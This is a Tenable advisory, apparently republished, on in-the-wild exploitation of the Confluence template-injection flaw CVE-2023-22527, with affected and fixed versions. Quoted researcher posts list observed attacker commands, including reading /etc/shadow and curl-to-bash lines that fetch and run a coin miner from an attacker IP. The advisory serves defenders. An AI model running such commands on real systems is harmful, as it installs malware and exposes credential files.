CVE-2023-22527: Atlassian Confluence Data Center and Server Template Injection Exploited in the Wild
2024-1-24 01:25:56 Author: www.tenable.com(查看原文) 阅读量:48 收藏

A background with a blue gradient fading from right to left. The Tenable Research logo is located at the top center. Underneath the logo is a yellow/orange box containing the word "ADVISORY" in it. Underneath the box are the words "Vulnerability Exploited" in white text.

In the wild exploitation has begun for a recently disclosed, critical severity flaw in Atlassian Confluence Data Center and Server

Background

On January 16, Atlassian published an advisory for a critical flaw in its Confluence Data Center and Confluence Server products that was assigned a maximum CVSSv3 score of 10:

CVEDescriptionCVSSv3
CVE-2023-22527Atlassian Confluence Data Center and Server Template Injection Vulnerability10.0

At the time of original publication, no in-the-wild exploitation has occurred. However, as of January 22, exploitation attempts have been observed.

Analysis

CVE-2023-22527 is a template injection vulnerability in Atlassian Confluence Data Center and Server. This vulnerability only affects out-of-date versions of these products. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to a vulnerable Confluence Data Center or Server instance. Successful exploitation would allow an attacker to obtain remote code execution.

In the wild exploitation reported by multiple sources

On January 22, several sources confirmed observations of in the wild exploitation attempts using CVE-2023-22527 including GreyNoise, ShadowServer, SANS Internet Storm Center (ISC), and The DFIR Report [1, 2].

We are detecting activity for CVE-2023-22527, which relates to a critical Atlassian Confluence Template Injection RCE vulnerability. So far, commands are focused on `id` `whoami` and `cat /etc/shadow` - Patch before it's too late!https://t.co/emEWll0PFk

— GreyNoise (@GreyNoiseIO) January 22, 2024

The DFIR Report specifically called out attempts to deploy cryptocurrency miners (or coin miners) using this vulnerability:

The coin miner attempts are starting to roll in:

Commands:
➡️curl -s http://23[.]94[.]214[.]119:8010/xs.jpg | bash
➡️curl -s http://23[.]94[.]214[.]119:8010/xs.jpg -o /tmp/.x;chmod x /tmp/.x;sh /tmp/.x

Source IP: 
149.102.70[.]165

Sandbox run: https://t.co/CxKHSGBdXd pic.twitter.com/9F16cOsq50

— The DFIR Report (@TheDFIRReport) January 22, 2024

Third vulnerability exploited in Confluence Data Center and Server in four months

Since October 2023, there have been three vulnerabilities in Confluence Data Center and Server that have been exploited in the wild, including one zero-day flaw.

Historically, Atlassian Confluence Data Center and Server has been a popular target by attackers because it is a public facing asset that is widely used. As recently as late December 2023, our partners at GreyNoise observed a spike in exploitation attempts against Atlassian products using a mix of broad scanning, hardcoded passwords as well as several CVEs including CVE-2023-22515 and CVE-2023-22518.

In addition to the uptick in exploitation attempts, on January 22, researchers at ProjectDiscover released a technical writeup on the vulnerability along with a nuclei template. With publicly available details, we expect exploitation attempts for CVE-2023-22527 to continue to increase in the coming days and weeks.

Proof of concept

Tenable’s Security Response Team has identified several proof-of-concept (PoC) exploits for CVE-2023-22527 posted to GitHub along with several posts containing the PoC on X.

Solution

The following versions of Atlassian Confluence Data Center and Server are affected by CVE-2023-22527:

Affected Versions
8.5.0 through 8.5.3
8.4.x
8.3.x
8.2.x
8.1.x
8.0.x

Atlassian lists several fixed versions, though they stress that some of the fixed versions are “no longer the most up-to-date and do not protect your instance from other non-critical vulnerabilities.” Therefore, Atlassian advises upgrading to the latest versions instead.

Affected ProductFixed VersionAffected by Non-Critical Vulnerabilities?
Atlassian Confluence Data Center and Server8.5.4 (LTS)Yes
 8.5.5* (LTS)No
Atlassian Confluence Data Center Only8.6.0Yes
 8.7.1Yes
 8.7.2*No

*Denotes the “Latest Version” as of January 22, 2024.

Because in-the-wild exploitation has been observed, we strongly advise customers to upgrade to the latest version of Confluence Data Center and Server as soon as possible.

Identifying affected systems

A list of Tenable plugins for this vulnerability can be found on the individual CVE page for CVE-2023-22527. This link will display all available plugins for this vulnerability, including upcoming plugins in our Plugins Pipeline.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

Satnam Narang

Satnam Narang

Satnam joined Tenable in 2018. He has over 15 years experience in the industry (M86 Security and Symantec). He contributed to the Anti-Phishing Working Group, helped develop a Social Networking Guide for the National Cyber Security Alliance, uncovered a huge spam botnet on Twitter and was the first to report on spam bots on Tinder. He's appeared on NBC Nightly News, Entertainment Tonight, Bloomberg West, and the Why Oh Why podcast.

Interests outside of work: Satnam writes poetry and makes hip-hop music. He enjoys live music, spending time with his three nieces, football and basketball, Bollywood movies and music and Grogu (Baby Yoda).

Related Articles

  • Exposure Management
  • Vulnerability Management

Cybersecurity News You Can Use

Enter your email and never miss timely alerts and security guidance from the experts at Tenable.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Thank You

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Thank You

Thank you for your interest in Tenable.io. A representative will be in touch soon.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Thank You

Thank you for your interest in Tenable Vulnerability Management. A representative will be in touch soon.

Try Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Thank You

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

Request a demo of Tenable Security Center

Formerly Tenable.sc

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

* Field is required

Request a demo of Tenable OT Security

Formerly Tenable.ot

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

Request a demo of Tenable Identity Exposure

Formerly Tenable.ad

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

Request a Demo of Tenable Cloud Security

Exceptional unified cloud security awaits you!

We’ll show you exactly how Tenable Cloud Security helps you deliver multi-cloud asset discovery, prioritized risk assessments and automated compliance/audit reports.

See
Tenable One
In Action

Exposure management for the modern attack surface.

See Tenable Attack Surface Management In Action

Formerly Tenable.asm

Know the exposure of every asset on any platform.

Thank You

Thank you for your interest in Tenable Attack Surface Management. A representative will be in touch soon.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Learn How Tenable Helps Achieve SLCGP Cybersecurity Plan Requirements

Tenable solutions help fulfill all SLCGP requirements. Connect with a Tenable representative to learn more.


文章来源: https://www.tenable.com/blog/cve-2023-22527-atlassian-confluence-data-center-and-server-template-injection-exploited-in-the
如有侵权请联系:admin#unsafe.sh